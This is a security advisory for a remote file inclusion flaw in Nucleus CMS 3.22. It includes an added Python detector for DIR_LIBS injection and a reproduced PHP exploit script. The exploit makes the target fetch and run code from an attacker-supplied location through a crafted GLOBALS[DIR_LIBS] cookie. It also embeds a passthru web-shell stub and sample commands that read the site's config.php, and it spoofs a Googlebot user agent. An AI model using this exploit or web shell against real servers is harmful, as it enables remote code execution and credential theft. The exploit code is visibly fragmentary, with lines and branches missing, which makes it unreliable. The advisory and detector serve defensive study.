Category:   Application (Forum/Board/Portal)  >   Nucleus
Vendors:
Nucleus Include File Bug in 'PLUGINADMIN.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016146
SecurityTracker URL:
CVE Reference:   CVE-2006-2583
Updated:  Sep 5 2009
Original Entry Date:  May 24 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.22
Description:   rgod reported a vulnerability in Nucleus. A remote user can include and execute arbitrary code on the target system.

The 'nucleus/libs/PLUGINADMIN.php' script passes the 'DIR_LIBS' variable to an include() call without ensuring that the variable was set by the application rather than by the request. If register_globals and allow_url_fopen are enabled, a remote user can supply a specially crafted URL (or cookie) to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
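Because no legitimate client ever sends a DIR_LIBS parameter, attempts to set it are easy to spot at the web tier before the include() runs. The following Python is an added example and is neither SecurityTracker's nor Nucleus' code: it parses raw HTTP requests aimed at nucleus/libs/PLUGINADMIN.php, flags any assignment to DIR_LIBS in the query string, request body or Cookie header (including the GLOBALS[DIR_LIBS] spelling that the exploit below sends as a cookie), and marks values carrying a URL scheme as remote-inclusion attempts. The host name, address and sample requests are constructed for the example.

```python
"""Added example: flag attempts to inject DIR_LIBS into nucleus/libs/PLUGINADMIN.php.

Not Nucleus code and not part of the advisory; the sample requests are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Names that populate $DIR_LIBS under register_globals. The GLOBALS[...] spelling sets the
# global variable without appearing in $_GET/$_POST/$_COOKIE, so the script's isset() guard
# never sees it.
TARGET_PARAMS = {"dir_libs", "globals[dir_libs]"}
# A value beginning with a URL scheme becomes a remote include when allow_url_fopen is on.
REMOTE_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
VULNERABLE_PATH = "/nucleus/libs/pluginadmin.php"


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body); header names lowercased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) < 2:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target = request_line[0], request_line[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def cookie_pairs(header):
    """Parse a Cookie header into (name, value) pairs, tolerating a trailing ';'."""
    pairs = []
    for item in header.split(";"):
        name, _, value = item.partition("=")
        if name.strip():
            pairs.append((unquote(name.strip()), unquote(value.strip())))
    return pairs


def inclusion_attempts(raw):
    """Return (source, name, value, is_remote) for each external assignment to DIR_LIBS.

    Every hit is at least a probe; is_remote is True when include() would fetch the
    value over the network.
    """
    method, target, headers, body = parse_request(raw)
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULNERABLE_PATH):
        return []
    candidates = [("query", n, v) for n, v in parse_qsl(parts.query, keep_blank_values=True)]
    if "cookie" in headers:
        candidates += [("cookie", n, v) for n, v in cookie_pairs(headers["cookie"])]
    if method == "POST" and body:
        candidates += [("body", n, v) for n, v in parse_qsl(body, keep_blank_values=True)]
    hits = []
    for source, name, value in candidates:
        if name.strip().lower() in TARGET_PARAMS:
            hits.append((source, name, value, bool(REMOTE_SCHEME.match(value))))
    return hits


# Constructed sample traffic (RFC 5737 documentation address, made-up host); none of this is real.
SAMPLE_REQUESTS = [
    "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://203.0.113.5/x.txt HTTP/1.0\r\n"
    "Host: blog.example\r\n\r\n",
    "GET /blog/nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n"
    "Host: blog.example\r\n"
    "Cookie: GLOBALS[DIR_LIBS]=http://203.0.113.5/; cmd=id;\r\n\r\n",
    # plain DIR_LIBS with a local path: caught by the script's isset() guard, but still a probe
    "POST /nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\nHost: blog.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\nDIR_LIBS=../../",
    "GET /nucleus/index.php?itemid=12 HTTP/1.0\r\nHost: blog.example\r\nCookie: PHPSESSID=abc123\r\n\r\n",
]


def scan(requests):
    """Map each request index to its hits; requests with no hits are omitted."""
    return {i: hits for i, hits in ((i, inclusion_attempts(r)) for i, r in enumerate(requests)) if hits}


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS).items():
        for source, name, value, remote in hits:
            print("request %d: %s via %s = %r (%s)" % (index, name, source, value,
                                                       "REMOTE" if remote else "local"))
```

The rule keys on the parameter name rather than on the value, so a local-path probe is logged as well as a remote one; on a PHP build where register_globals cannot be turned off, blocking any request that carries these names is a reasonable interim control until the include() is fixed.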

A demonstration exploit URL is provided:


The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Nucleus CMS <= 3.22 arbitrary remote inclusion

#!/usr/bin/php -q -d short_open_tag=on
echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n";
echo "by rgod\r\n";
echo "site:\r\n\r\n";
echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n";
works with:

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Nucleus\r\n";
echo "location:  an arbitrary location with the code to include\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /nucleus/ cat ./../../config.php\r\n";
echo "php ".$argv[0]." localhost /nucleus/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";
echo "note, you need this code in\r\n";
echo "<?php\r\n";
echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
echo "ini_set(\"max_execution_time\",0);\r\n";
echo "echo \"*delim*\";\r\n";
echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
echo "echo \"*delim*\";\r\n";
echo "?>\r\n";

/* software site:

   i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:

$aVarsToCheck = array('DIR_LIBS');
foreach ($aVarsToCheck as $varName) {
	if (phpversion() >= '4.1.0') {
		// the guard only inspects the named request arrays, not the global
		// variable itself; a register_globals assignment made through the
		// GLOBALS[DIR_LIBS] form shows up in none of these arrays
		if (   isset($_GET[$varName])
			|| isset($_POST[$varName])
			|| isset($_COOKIE[$varName])
			|| isset($_ENV[$varName])
			|| isset($_SESSION[$varName])
			|| isset($_FILES[$varName])
		) {
			die('Sorry. An error occurred.');
		}
	} else {
		if (   isset($HTTP_GET_VARS[$varName])
			|| isset($HTTP_POST_VARS[$varName])
			|| isset($HTTP_COOKIE_VARS[$varName])
			|| isset($HTTP_ENV_VARS[$varName])
			|| isset($HTTP_SESSION_VARS[$varName])
			|| isset($HTTP_POST_FILES[$varName])
		) {
			die('Sorry. An error occurred.');
		}
	}
}

// $DIR_LIBS is still whatever register_globals left in it
include($DIR_LIBS . 'ADMIN.php');

so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc:


where on we have some php code in

also, if register_globals = On & magic_quotes_gpc = Off:



function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    if (!$ock) {
      echo 'No response from proxy...';die;
  if ($proxy=='') {
    while (!feof($ock)) {
  else {
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;

if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
for ($i=4; $i<=$argc-1; $i++){
if (($temp<>"-p") and ($temp<>"-P"))
$cmd.=" ".$argv[$i];
if ($temp=="-p")
if ($temp=="-P")
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}

$packet ="GET ".$p."nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +\r\n";
$packet.="Host: ".$host."\r\n";
//through cookies, it's the same, maybe can bypass some ids...
$packet.="Cookie: GLOBALS[DIR_LIBS]=".$loc."; cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";

if (strstr($html,"*delim*"))
  echo "Exploit succeeded...";
//if you are here...
echo "Exploit failed...\r\n";

original url:


Copyright 2019, LLC